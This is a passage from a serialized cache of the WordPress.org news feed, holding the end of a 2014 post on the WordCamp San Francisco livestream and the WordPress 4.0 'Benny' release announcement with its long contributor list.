href=\"http://2014.sf.wordcamp.org\">WordCamp San Francisco</a> is the official annual WordPress conference, gathering the community every year <a title=\"An old website for a WordPress long time ago\" href=\"http://2006.sf.wordcamp.org\">since 2006</a>. This is the time when Matt Mullenweg addresses the community in his annual <a href=\"http://wordpress.tv/?s=state+of+the+word\">State of the Word</a> presentation – a recap of the year in WordPress and giving us a glimpse into its future.</p>\n<p>This year the speaker lineup is stellar. There will be talks by three of the lead WordPress developers: <a href=\"http://2014.sf.wordcamp.org/speakers/#wcorg-speaker-andrew-nacin\">Andrew Nacin</a>, <a href=\"http://2014.sf.wordcamp.org/speakers/#wcorg-speaker-helen-hou-sandi\">Helen Hou-Sandí</a>, and <a href=\"http://2014.sf.wordcamp.org/speakers/#wcorg-speaker-mark-jaquith\">Mark Jaquith</a>. We’re also looking forward to speakers like <a href=\"http://2014.sf.wordcamp.org/speakers/#wcorg-speaker-jenny-lawson\">Jenny Lawson</a>, also known as The Bloggess, and <a href=\"http://2014.sf.wordcamp.org/speaker/chris-lema/\">Chris Lema</a>. If you’re at all interested in the web, you will appreciate the appearance of <a href=\"http://2014.sf.wordcamp.org/speakers/#wcorg-speaker-jeff-veen\">Jeff Veen</a> – one of the creators of Google Analytics and co-founder of Typekit.</p>\n<p>Even though San Francisco is far far away for most of you, you can still be part of the fun and watch all presentations in real-time via livestream:</p>\n<p><a href=\"http://2014.sf.wordcamp.org/tickets/\">Get a livestream ticket and watch all talks from WordCamp San Francisco live</a></p>\n<p>If you hurry, you can get one of the special livestream tickets, including a WordCamp San Francisco 2104 t-shirt. You can find all the technical details and start times <a href=\"http://2014.sf.wordcamp.org/live-stream/\">at the WordCamp San Francisco website</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2014/10/wcsf-livestream/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:42:\"\n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"WordPress 4.0 “Benny”\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:41:\"https://wordpress.org/news/2014/09/benny/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"https://wordpress.org/news/2014/09/benny/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 04 Sep 2014 17:05:39 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3296\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:370:\"Version 4.0 of WordPress, named “Benny” in honor of jazz clarinetist and bandleader Benny Goodman, is available for download or update in your WordPress dashboard. While 4.0 is just another number for us after 3.9 and before 4.1, we feel we’ve put a little extra polish into it. This release brings you a smoother writing and management experience […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:23569:\"<p>Version 4.0 of WordPress, named “Benny” in honor of jazz clarinetist and bandleader <a href=\"http://en.wikipedia.org/wiki/Benny_Goodman\">Benny Goodman</a>, is available <a href=\"https://wordpress.org/download/\">for download</a> or update in your WordPress dashboard. While 4.0 is just another number for us after 3.9 and before 4.1, we feel we’ve put a little extra polish into it. This release brings you a smoother writing and management experience we think you’ll enjoy.</p>\n<div id=\"v-bUdzKMro-1\" class=\"video-player\"><embed id=\"v-bUdzKMro-1-video\" src=\"https://v0.wordpress.com/player.swf?v=1.04&guid=bUdzKMro&isDynamicSeeking=true\" type=\"application/x-shockwave-flash\" width=\"692\" height=\"388\" title=\"Introducing WordPress 4.0 "Benny"\" wmode=\"direct\" seamlesstabbing=\"true\" allowfullscreen=\"true\" allowscriptaccess=\"always\" overstretch=\"true\"></embed></div>\n<hr />\n<h2 style=\"text-align: center\">Manage your media with style</h2>\n<p><img class=\"alignnone size-full wp-image-3316\" src=\"https://wordpress.org/news/files/2014/09/media.jpg\" alt=\"Media Library\" width=\"1000\" height=\"586\" />Explore your uploads in a beautiful, endless grid. A new details preview makes viewing and editing any amount of media in sequence a snap.</p>\n<hr />\n<h2 style=\"text-align: center\">Working with embeds has never been easier</h2>\n<div style=\"width: 632px; \" class=\"wp-video\"><!--[if lt IE 9]><script>document.createElement(\'video\');</script><![endif]-->\n<video class=\"wp-video-shortcode\" id=\"video-3296-1\" width=\"632\" height=\"445\" autoplay=\"1\" preload=\"metadata\" controls=\"controls\"><source type=\"video/mp4\" src=\"//s.w.org/images/core/4.0/embed.mp4?_=1\" /><source type=\"video/webm\" src=\"//s.w.org/images/core/4.0/embed.webm?_=1\" /><source type=\"video/ogg\" src=\"//s.w.org/images/core/4.0/embed.ogv?_=1\" /><a href=\"//s.w.org/images/core/4.0/embed.mp4\">//s.w.org/images/core/4.0/embed.mp4</a></video></div>\n<p>Paste in a YouTube URL on a new line, and watch it magically become an embedded video. Now try it with a tweet. Oh yeah — embedding has become a visual experience. The editor shows a true preview of your embedded content, saving you time and giving you confidence.</p>\n<p>We’ve expanded the services supported by default, too — you can embed videos from CollegeHumor, playlists from YouTube, and talks from TED. <a href=\"https://codex.wordpress.org/Embeds\">Check out all of the embeds</a> that WordPress supports.</p>\n<hr />\n<h2 style=\"text-align: center\">Focus on your content</h2>\n<div style=\"width: 632px; \" class=\"wp-video\"><video class=\"wp-video-shortcode\" id=\"video-3296-2\" width=\"632\" height=\"356\" autoplay=\"1\" preload=\"metadata\" controls=\"controls\"><source type=\"video/mp4\" src=\"//s.w.org/images/core/4.0/focus.mp4?_=2\" /><source type=\"video/webm\" src=\"//s.w.org/images/core/4.0/focus.webm?_=2\" /><source type=\"video/ogg\" src=\"//s.w.org/images/core/4.0/focus.ogv?_=2\" /><a href=\"//s.w.org/images/core/4.0/focus.mp4\">//s.w.org/images/core/4.0/focus.mp4</a></video></div>\n<p>Writing and editing is smoother and more immersive with an editor that expands to fit your content as you write, and keeps the formatting tools available at all times.</p>\n<hr />\n<h2 style=\"text-align: center\">Finding the right plugin</h2>\n<p><img class=\"aligncenter size-large wp-image-3309\" src=\"https://wordpress.org/news/files/2014/09/add-plugin1-1024x600.png\" alt=\"Add plugins\" width=\"692\" height=\"405\" /></p>\n<p>There are more than 30,000 free and open source plugins in the WordPress plugin directory. WordPress 4.0 makes it easier to find the right one for your needs, with new metrics, improved search, and a more visual browsing experience.</p>\n<hr />\n<h2 style=\"text-align: center\">The Ensemble</h2>\n<p>This release was led by <a href=\"http://helenhousandi.com\">Helen Hou-Sandí</a>, with the help of these fine individuals. There are 275 contributors with props in this release, a new high. Pull up some Benny Goodman on your music service of choice, as a bandleader or in one of his turns as a classical clarinetist, and check out some of their profiles:</p>\n<p><a href=\"https://profiles.wordpress.org/aaroncampbell\">Aaron D. Campbell</a>, <a href=\"https://profiles.wordpress.org/jorbin\">Aaron Jorbin</a>, <a href=\"https://profiles.wordpress.org/adamsilverstein\">Adam Silverstein</a>, <a href=\"https://profiles.wordpress.org/viper007bond\">Alex Mills (Viper007Bond)</a>, <a href=\"https://profiles.wordpress.org/tellyworth\">Alex Shiels</a>, <a href=\"https://profiles.wordpress.org/alexanderrohmann\">Alexander Rohmann</a>, <a href=\"https://profiles.wordpress.org/aliso\">Alison Barrett</a>, <a href=\"https://profiles.wordpress.org/collinsinternet\">Allan Collins</a>, <a href=\"https://profiles.wordpress.org/amit\">Amit Gupta</a>, <a href=\"https://profiles.wordpress.org/sabreuse\">Amy Hendrix (sabreuse)</a>, <a href=\"https://profiles.wordpress.org/afercia\">Andrea Fercia</a>, <a href=\"https://profiles.wordpress.org/andrezrv\">Andres Villarreal</a>, <a href=\"https://profiles.wordpress.org/zamfeer\">Andrew Mowe</a>, <a href=\"https://profiles.wordpress.org/sumobi\">Andrew Munro (sumobi)</a>, <a href=\"https://profiles.wordpress.org/nacin\">Andrew Nacin</a>, <a href=\"https://profiles.wordpress.org/azaozz\">Andrew Ozz</a>, <a href=\"https://profiles.wordpress.org/andy\">Andy Skelton</a>, <a href=\"https://profiles.wordpress.org/ankit-k-gupta\">Ankit K Gupta</a>, <a href=\"https://profiles.wordpress.org/atimmer\">Anton Timmermans</a>, <a href=\"https://profiles.wordpress.org/arnee\">Arne Brachhold</a>, <a href=\"https://profiles.wordpress.org/aubreypwd\">Aubrey Portwood</a>, <a href=\"https://profiles.wordpress.org/filosofo\">Austin Matzko</a>, <a href=\"https://profiles.wordpress.org/empireoflight\">Ben Dunkle</a>, <a href=\"https://profiles.wordpress.org/kau-boy\">Bernhard Kau</a>, <a href=\"https://profiles.wordpress.org/boonebgorges\">Boone Gorges</a>, <a href=\"https://profiles.wordpress.org/bradyvercher\">Brady Vercher</a>, <a href=\"https://profiles.wordpress.org/bramd\">Bram Duvigneau</a>, <a href=\"https://profiles.wordpress.org/kraftbj\">Brandon Kraft</a>, <a href=\"https://profiles.wordpress.org/krogsgard\">Brian Krogsgard</a>, <a href=\"https://profiles.wordpress.org/brianlayman\">Brian Layman</a>, <a href=\"https://profiles.wordpress.org/rzen\">Brian Richards</a>, <a href=\"https://profiles.wordpress.org/camdensegal\">Camden Segal</a>, <a href=\"https://profiles.wordpress.org/sixhours\">Caroline Moore</a>, <a href=\"https://profiles.wordpress.org/mackensen\">Charles Fulton</a>, <a href=\"https://profiles.wordpress.org/chouby\">Chouby</a>, <a href=\"https://profiles.wordpress.org/chrico\">ChriCo</a>, <a href=\"https://profiles.wordpress.org/c3mdigital\">Chris Olbekson</a>, <a href=\"https://profiles.wordpress.org/chrisl27\">chrisl27</a>, <a href=\"https://profiles.wordpress.org/caxelsson\">Christian Axelsson</a>, <a href=\"https://profiles.wordpress.org/cfinke\">Christopher Finke</a>, <a href=\"https://profiles.wordpress.org/boda1982\">Christopher Spires</a>, <a href=\"https://profiles.wordpress.org/clifgriffin\">Clifton Griffin</a>, <a href=\"https://profiles.wordpress.org/jupiterwise\">Corey McKrill</a>, <a href=\"https://profiles.wordpress.org/corphi\">Corphi</a>, <a href=\"https://profiles.wordpress.org/extendwings\">Daisuke Takahashi</a>, <a href=\"https://profiles.wordpress.org/ghost1227\">Dan Griffiths</a>, <a href=\"https://profiles.wordpress.org/danielbachhuber\">Daniel Bachhuber</a>, <a href=\"https://profiles.wordpress.org/danielhuesken\">Daniel Husken</a>, <a href=\"https://profiles.wordpress.org/redsweater\">Daniel Jalkut (Red Sweater)</a>, <a href=\"https://profiles.wordpress.org/dannydehaan\">Danny de Haan</a>, <a href=\"https://profiles.wordpress.org/dkotter\">Darin Kotter</a>, <a href=\"https://profiles.wordpress.org/koop\">Daryl Koopersmith</a>, <a href=\"https://profiles.wordpress.org/dllh\">Daryl L. L. Houston (dllh)</a>, <a href=\"https://profiles.wordpress.org/davidakennedy\">David A. Kennedy</a>, <a href=\"https://profiles.wordpress.org/dlh\">David Herrera</a>, <a href=\"https://profiles.wordpress.org/dnaber-de\">David Naber</a>, <a href=\"https://profiles.wordpress.org/davidthemachine\">DavidTheMachine</a>, <a href=\"https://profiles.wordpress.org/debaat\">DeBAAT</a>, <a href=\"https://profiles.wordpress.org/dd32\">Dion Hulse</a>, <a href=\"https://profiles.wordpress.org/ocean90\">Dominik Schilling</a>, <a href=\"https://profiles.wordpress.org/donncha\">Donncha O Caoimh</a>, <a href=\"https://profiles.wordpress.org/drewapicture\">Drew Jaynes</a>, <a href=\"https://profiles.wordpress.org/dustyn\">Dustyn Doyle</a>, <a href=\"https://profiles.wordpress.org/eddiemoya\">Eddie Moya</a>, <a href=\"https://profiles.wordpress.org/oso96_2000\">Eduardo Reveles</a>, <a href=\"https://profiles.wordpress.org/edwin-at-studiojoyocom\">Edwin Siebel</a>, <a href=\"https://profiles.wordpress.org/ehg\">ehg</a>, <a href=\"https://profiles.wordpress.org/erayalakese\">erayalakese</a>, <a href=\"https://profiles.wordpress.org/ericlewis\">Eric Andrew Lewis</a>, <a href=\"https://profiles.wordpress.org/ebinnion\">Eric Binnion</a>, <a href=\"https://profiles.wordpress.org/ericmann\">Eric Mann</a>, <a href=\"https://profiles.wordpress.org/ejdanderson\">Evan Anderson</a>, <a href=\"https://profiles.wordpress.org/eherman24\">Evan Herman</a>, <a href=\"https://profiles.wordpress.org/fab1en\">Fabien Quatravaux</a>, <a href=\"https://profiles.wordpress.org/fahmiadib\">Fahmi Adib</a>, <a href=\"https://profiles.wordpress.org/feedmeastraycat\">feedmeastraycat</a>, <a href=\"https://profiles.wordpress.org/frank-klein\">Frank Klein</a>, <a href=\"https://profiles.wordpress.org/garhdez\">garhdez</a>, <a href=\"https://profiles.wordpress.org/garyc40\">Gary Cao</a>, <a href=\"https://profiles.wordpress.org/garyj\">Gary Jones</a>, <a href=\"https://profiles.wordpress.org/pento\">Gary Pendergast</a>, <a href=\"https://profiles.wordpress.org/garza\">garza</a>, <a href=\"https://profiles.wordpress.org/gauravmittal1995\">gauravmittal1995</a>, <a href=\"https://profiles.wordpress.org/gavra\">Gavrisimo</a>, <a href=\"https://profiles.wordpress.org/georgestephanis\">George Stephanis</a>, <a href=\"https://profiles.wordpress.org/grahamarmfield\">Graham Armfield</a>, <a href=\"https://profiles.wordpress.org/vancoder\">Grant Mangham</a>, <a href=\"https://profiles.wordpress.org/gcorne\">Gregory Cornelius</a>, <a href=\"https://profiles.wordpress.org/bordoni\">Gustavo Bordoni</a>, <a href=\"https://profiles.wordpress.org/harrym\">harrym</a>, <a href=\"https://profiles.wordpress.org/hebbet\">hebbet</a>, <a href=\"https://profiles.wordpress.org/hinnerk\">Hinnerk Altenburg</a>, <a href=\"https://profiles.wordpress.org/hlashbrooke\">Hugh Lashbrooke</a>, <a href=\"https://profiles.wordpress.org/iljoja\">iljoja</a>, <a href=\"https://profiles.wordpress.org/imath\">imath</a>, <a href=\"https://profiles.wordpress.org/ipstenu\">Ipstenu (Mika Epstein)</a>, <a href=\"https://profiles.wordpress.org/issuu\">issuu</a>, <a href=\"https://profiles.wordpress.org/jdgrimes\">J.D. Grimes</a>, <a href=\"https://profiles.wordpress.org/jacklenox\">Jack Lenox</a>, <a href=\"https://profiles.wordpress.org/jackreichert\">Jack Reichert</a>, <a href=\"https://profiles.wordpress.org/jacobdubail\">Jacob Dubail</a>, <a href=\"https://profiles.wordpress.org/janhenkg\">JanHenkG</a>, <a href=\"https://profiles.wordpress.org/avryl\">Janneke Van Dorpe</a>, <a href=\"https://profiles.wordpress.org/jwenerd\">Jared Wenerd</a>, <a href=\"https://profiles.wordpress.org/strangerstudios\">Jason Coleman</a>, <a href=\"https://profiles.wordpress.org/jaza613\">Jaza613</a>, <a href=\"https://profiles.wordpress.org/jeffstieler\">Jeff Stieler</a>, <a href=\"https://profiles.wordpress.org/jeremyfelt\">Jeremy Felt</a>, <a href=\"https://profiles.wordpress.org/jpry\">Jeremy Pry</a>, <a href=\"https://profiles.wordpress.org/slimndap\">Jeroen Schmit</a>, <a href=\"https://profiles.wordpress.org/jerrysarcastic\">Jerry Bates (jerrysarcastic)</a>, <a href=\"https://profiles.wordpress.org/jesin\">Jesin A</a>, <a href=\"https://profiles.wordpress.org/jayjdk\">Jesper Johansen (jayjdk)</a>, <a href=\"https://profiles.wordpress.org/engelen\">Jesper van Engelen</a>, <a href=\"https://profiles.wordpress.org/jesper800\">Jesper van Engelen</a>, <a href=\"https://profiles.wordpress.org/jessepollak\">Jesse Pollak</a>, <a href=\"https://profiles.wordpress.org/jgadbois\">jgadbois</a>, <a href=\"https://profiles.wordpress.org/jartes\">Joan Artes</a>, <a href=\"https://profiles.wordpress.org/joedolson\">Joe Dolson</a>, <a href=\"https://profiles.wordpress.org/joehoyle\">Joe Hoyle</a>, <a href=\"https://profiles.wordpress.org/jkudish\">Joey Kudish</a>, <a href=\"https://profiles.wordpress.org/johnbillion\">John Blackbourn</a>, <a href=\"https://profiles.wordpress.org/johnjamesjacoby\">John James Jacoby</a>, <a href=\"https://profiles.wordpress.org/johnzanussi\">John Zanussi</a>, <a href=\"https://profiles.wordpress.org/duck_\">Jon Cave</a>, <a href=\"https://profiles.wordpress.org/jonnyauk\">jonnyauk</a>, <a href=\"https://profiles.wordpress.org/joostdevalk\">Joost de Valk</a>, <a href=\"https://profiles.wordpress.org/softmodeling\">Jordi Cabot</a>, <a href=\"https://profiles.wordpress.org/jjeaton\">Josh Eaton</a>, <a href=\"https://profiles.wordpress.org/tai\">JOTAKI Taisuke</a>, <a href=\"https://profiles.wordpress.org/juliobox\">Julio Potier</a>, <a href=\"https://profiles.wordpress.org/justinsainton\">Justin Sainton</a>, <a href=\"https://profiles.wordpress.org/jtsternberg\">Justin Sternberg</a>, <a href=\"https://profiles.wordpress.org/greenshady\">Justin Tadlock</a>, <a href=\"https://profiles.wordpress.org/kadamwhite\">K.Adam White</a>, <a href=\"https://profiles.wordpress.org/trepmal\">Kailey (trepmal)</a>, <a href=\"https://profiles.wordpress.org/kapeels\">kapeels</a>, <a href=\"https://profiles.wordpress.org/ryelle\">Kelly Dwan</a>, <a href=\"https://profiles.wordpress.org/kevinlangleyjr\">Kevin Langley</a>, <a href=\"https://profiles.wordpress.org/kworthington\">Kevin Worthington</a>, <a href=\"https://profiles.wordpress.org/kpdesign\">Kim Parsell</a>, <a href=\"https://profiles.wordpress.org/kwight\">Kirk Wight</a>, <a href=\"https://profiles.wordpress.org/kitchin\">kitchin</a>, <a href=\"https://profiles.wordpress.org/ixkaito\">Kite</a>, <a href=\"https://profiles.wordpress.org/knutsp\">Knut Sparhell</a>, <a href=\"https://profiles.wordpress.org/kovshenin\">Konstantin Kovshenin</a>, <a href=\"https://profiles.wordpress.org/obenland\">Konstantin Obenland</a>, <a href=\"https://profiles.wordpress.org/kurtpayne\">Kurt Payne</a>, <a href=\"https://profiles.wordpress.org/lancewillett\">Lance Willett</a>, <a href=\"https://profiles.wordpress.org/leewillis77\">Lee Willis</a>, <a href=\"https://profiles.wordpress.org/lessbloat\">lessbloat</a>, <a href=\"https://profiles.wordpress.org/layotte\">Lew Ayotte</a>, <a href=\"https://profiles.wordpress.org/lritter\">lritter</a>, <a href=\"https://profiles.wordpress.org/lukecarbis\">Luke Carbis</a>, <a href=\"https://profiles.wordpress.org/lgedeon\">Luke Gedeon</a>, <a href=\"https://profiles.wordpress.org/m_i_n\">m_i_n</a>, <a href=\"https://profiles.wordpress.org/funkatronic\">Manny Fleurmond</a>, <a href=\"https://profiles.wordpress.org/targz-1\">Manuel Schmalstieg</a>, <a href=\"https://profiles.wordpress.org/clorith\">Marius (Clorith)</a>, <a href=\"https://profiles.wordpress.org/markjaquith\">Mark Jaquith</a>, <a href=\"https://profiles.wordpress.org/markoheijnen\">Marko Heijnen</a>, <a href=\"https://profiles.wordpress.org/mjbanks\">Matt Banks</a>, <a href=\"https://profiles.wordpress.org/sivel\">Matt Martz</a>, <a href=\"https://profiles.wordpress.org/matt\">Matt Mullenweg</a>, <a href=\"https://profiles.wordpress.org/mattwiebe\">Matt Wiebe</a>, <a href=\"https://profiles.wordpress.org/mboynes\">Matthew Boynes</a>, <a href=\"https://profiles.wordpress.org/mdbitz\">Matthew Denton</a>, <a href=\"https://profiles.wordpress.org/mattheweppelsheimer\">Matthew Eppelsheimer</a>, <a href=\"https://profiles.wordpress.org/mattheu\">Matthew Haines-Young</a>, <a href=\"https://profiles.wordpress.org/mattyrob\">mattyrob</a>, <a href=\"https://profiles.wordpress.org/meekyhwang\">meekyhwang</a>, <a href=\"https://profiles.wordpress.org/melchoyce\">Mel Choyce</a>, <a href=\"https://profiles.wordpress.org/mdawaffe\">Michael Adams (mdawaffe)</a>, <a href=\"https://profiles.wordpress.org/michalzuber\">michalzuber</a>, <a href=\"https://profiles.wordpress.org/midxcat\">midxcat</a>, <a href=\"https://profiles.wordpress.org/mauteri\">Mike Auteri</a>, <a href=\"https://profiles.wordpress.org/mikehansenme\">Mike Hansen</a>, <a href=\"https://profiles.wordpress.org/mikejolley\">Mike Jolley</a>, <a href=\"https://profiles.wordpress.org/mikelittle\">Mike Little</a>, <a href=\"https://profiles.wordpress.org/mikemanger\">Mike Manger</a>, <a href=\"https://profiles.wordpress.org/mnelson4\">Mike Nelson</a>, <a href=\"https://profiles.wordpress.org/dh-shredder\">Mike Schroder</a>, <a href=\"https://profiles.wordpress.org/mikeyarce\">Mikey Arce</a>, <a href=\"https://profiles.wordpress.org/dimadin\">Milan Dinic</a>, <a href=\"https://profiles.wordpress.org/morganestes\">Morgan Estes</a>, <a href=\"https://profiles.wordpress.org/usermrpapa\">Mr Papa</a>, <a href=\"https://profiles.wordpress.org/mrmist\">mrmist</a>, <a href=\"https://profiles.wordpress.org/m_uysl\">Mustafa Uysal</a>, <a href=\"https://profiles.wordpress.org/muvimotv\">MuViMoTV</a>, <a href=\"https://profiles.wordpress.org/nabil_kadimi\">nabil_kadimi</a>, <a href=\"https://profiles.wordpress.org/namibia\">Namibia</a>, <a href=\"https://profiles.wordpress.org/alex-ye\">Nashwan Doaqan</a>, <a href=\"https://profiles.wordpress.org/nd987\">nd987</a>, <a href=\"https://profiles.wordpress.org/neil_pie\">Neil Pie</a>, <a href=\"https://profiles.wordpress.org/niallkennedy\">Niall Kennedy</a>, <a href=\"https://profiles.wordpress.org/celloexpressions\">Nick Halsey</a>, <a href=\"https://profiles.wordpress.org/nbachiyski\">Nikolay Bachiyski</a>, <a href=\"https://profiles.wordpress.org/schoenwaldnils\">Nils Schonwald</a>, <a href=\"https://profiles.wordpress.org/ninos-ego\">Ninos</a>, <a href=\"https://profiles.wordpress.org/nvwd\">Nowell VanHoesen</a>, <a href=\"https://profiles.wordpress.org/compute\">Patrick Hesselberg</a>, <a href=\"https://profiles.wordpress.org/pbearne\">Paul Bearne</a>, <a href=\"https://profiles.wordpress.org/pdclark\">Paul Clark</a>, <a href=\"https://profiles.wordpress.org/paulschreiber\">Paul Schreiber</a>, <a href=\"https://profiles.wordpress.org/paulwilde\">Paul Wilde</a>, <a href=\"https://profiles.wordpress.org/pavelevap\">pavelevap</a>, <a href=\"https://profiles.wordpress.org/westi\">Peter Westwood</a>, <a href=\"https://profiles.wordpress.org/philiparthurmoore\">Philip Arthur Moore</a>, <a href=\"https://profiles.wordpress.org/philipjohn\">Philip John</a>, <a href=\"https://profiles.wordpress.org/senlin\">Piet Bos</a>, <a href=\"https://profiles.wordpress.org/psoluch\">Piotr Soluch</a>, <a href=\"https://profiles.wordpress.org/mordauk\">Pippin Williamson</a>, <a href=\"https://profiles.wordpress.org/purzlbaum\">purzlbaum</a>, <a href=\"https://profiles.wordpress.org/rachelbaker\">Rachel Baker</a>, <a href=\"https://profiles.wordpress.org/rclations\">RC Lations</a>, <a href=\"https://profiles.wordpress.org/iamfriendly\">Richard Tape</a>, <a href=\"https://profiles.wordpress.org/rickalee\">Ricky Lee Whittemore</a>, <a href=\"https://profiles.wordpress.org/rob1n\">rob1n</a>, <a href=\"https://profiles.wordpress.org/miqrogroove\">Robert Chapin</a>, <a href=\"https://profiles.wordpress.org/rdall\">Robert Dall</a>, <a href=\"https://profiles.wordpress.org/harmr\">RobertHarm</a>, <a href=\"https://profiles.wordpress.org/rohan013\">Rohan Rawat</a>, <a href=\"https://profiles.wordpress.org/rhurling\">Rouven Hurling</a>, <a href=\"https://profiles.wordpress.org/ruudjoyo\">Ruud Laan</a>, <a href=\"https://profiles.wordpress.org/ryan\">Ryan Boren</a>, <a href=\"https://profiles.wordpress.org/rmccue\">Ryan McCue</a>, <a href=\"https://profiles.wordpress.org/sammybeats\">Sam Brodie</a>, <a href=\"https://profiles.wordpress.org/otto42\">Samuel Wood (Otto)</a>, <a href=\"https://profiles.wordpress.org/sathishn\">Sathish Nagarajan</a>, <a href=\"https://profiles.wordpress.org/coffee2code\">Scott Reilly</a>, <a href=\"https://profiles.wordpress.org/wonderboymusic\">Scott Taylor</a>, <a href=\"https://profiles.wordpress.org/greglone\">ScreenfeedFr</a>, <a href=\"https://profiles.wordpress.org/scribu\">scribu</a>, <a href=\"https://profiles.wordpress.org/seanchayes\">Sean Hayes</a>, <a href=\"https://profiles.wordpress.org/nessworthy\">Sean Nessworthy</a>, <a href=\"https://profiles.wordpress.org/sergejmueller\">Sergej Muller</a>, <a href=\"https://profiles.wordpress.org/sergeybiryukov\">Sergey Biryukov</a>, <a href=\"https://profiles.wordpress.org/shanebp\">shanebp</a>, <a href=\"https://profiles.wordpress.org/sharonaustin\">Sharon Austin</a>, <a href=\"https://profiles.wordpress.org/shaunandrews\">Shaun Andrews</a>, <a href=\"https://profiles.wordpress.org/simonp303\">Simon Pollard</a>, <a href=\"https://profiles.wordpress.org/simonwheatley\">Simon Wheatley</a>, <a href=\"https://profiles.wordpress.org/slobodanmanic\">Slobodan Manic</a>, <a href=\"https://profiles.wordpress.org/solarissmoke\">solarissmoke</a>, <a href=\"https://profiles.wordpress.org/sphoid\">sphoid</a>, <a href=\"https://profiles.wordpress.org/stephdau\">Stephane Daury</a>, <a href=\"https://profiles.wordpress.org/netweb\">Stephen Edgar</a>, <a href=\"https://profiles.wordpress.org/stompweb\">Steven Jones</a>, <a href=\"https://profiles.wordpress.org/5um17\">Sumit Singh</a>, <a href=\"https://profiles.wordpress.org/t4k1s\">t4k1s</a>, <a href=\"https://profiles.wordpress.org/iamtakashi\">Takashi Irie</a>, <a href=\"https://profiles.wordpress.org/taylorde\">Taylor Dewey</a>, <a href=\"https://profiles.wordpress.org/thomasvanderbeek\">Thomas van der Beek</a>, <a href=\"https://profiles.wordpress.org/tillkruess\">Till</a>, <a href=\"https://profiles.wordpress.org/codenameeli\">Tim 'Eli' Dalbey</a>, <a href=\"https://profiles.wordpress.org/tmeister\">tmeister</a>, <a href=\"https://profiles.wordpress.org/tobiasbg\">TobiasBg</a>, <a href=\"https://profiles.wordpress.org/tjnowell\">Tom J Nowell</a>, <a href=\"https://profiles.wordpress.org/willmot\">Tom Willmot</a>, <a href=\"https://profiles.wordpress.org/topher1kenobe\">Topher</a>, <a href=\"https://profiles.wordpress.org/torresga\">torresga</a>, <a href=\"https://profiles.wordpress.org/liljimmi\">Tracy Levesque</a>, <a href=\"https://profiles.wordpress.org/wpsmith\">Travis Smith</a>, <a href=\"https://profiles.wordpress.org/treyhunner\">treyhunner</a>, <a href=\"https://profiles.wordpress.org/umeshsingla\">Umesh Kumar</a>, <a href=\"https://profiles.wordpress.org/vinod-dalvi\">Vinod Dalvi</a>, <a href=\"https://profiles.wordpress.org/vlajos\">vlajos</a>, <a href=\"https://profiles.wordpress.org/voldemortensen\">voldemortensen</a>, <a href=\"https://profiles.wordpress.org/westonruter\">Weston Ruter</a>, <a href=\"https://profiles.wordpress.org/winterdev\">winterDev</a>, <a href=\"https://profiles.wordpress.org/wojtekszkutnik\">Wojtek Szkutnik</a>, <a href=\"https://profiles.wordpress.org/yoavf\">Yoav Farhi</a>, <a href=\"https://profiles.wordpress.org/katzwebdesign\">Zack Katz</a>, <a href=\"https://profiles.wordpress.org/tollmanz\">Zack Tollman</a>, and <a href=\"https://profiles.wordpress.org/zoerooney\">Zoe Rooney</a>. Also thanks to <a href=\"http://michaelpick.wordpress.com/\">Michael Pick</a> for producing the release video, and Helen with <a href=\"http://adriansandi.com\">Adrián Sandí</a> for the music.</p>\n<p>If you want to follow along or help out, check out <a 